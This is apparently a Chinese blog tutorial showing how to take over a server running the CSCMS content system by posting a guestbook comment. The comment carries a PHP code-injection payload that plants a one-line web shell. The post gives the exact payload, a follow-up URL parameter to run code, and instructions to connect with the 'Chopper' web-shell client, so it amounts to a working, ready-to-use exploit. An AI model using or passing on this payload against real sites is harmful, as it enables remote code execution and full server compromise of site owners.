一句留言直接拿小对发服务器教程

首先漏洞不是我本人找的，漏洞比较早了，是以前的CSCMS程式圆舞曲漏洞，我只是用本地搭建再一次复现这个用留言就能直接拿下对方服务器的漏洞

这个漏洞比较牛批了，就在留言板写一句话，就能直接getshell 菜刀链接，直接拿下服务器

接下来开始复现一下这个程式的漏洞。

在任意一个cms网站留言

这句话

{cscmsphp} assert($_REQUEST{a});{/csmcsphp}

留言完之后什么都没显示的话是正常的

然后用url直接穿参

?a=phpinfo();

然后用菜刀链接密码就是那个a如果没有菜刀的可以去我之前的文章看看里面有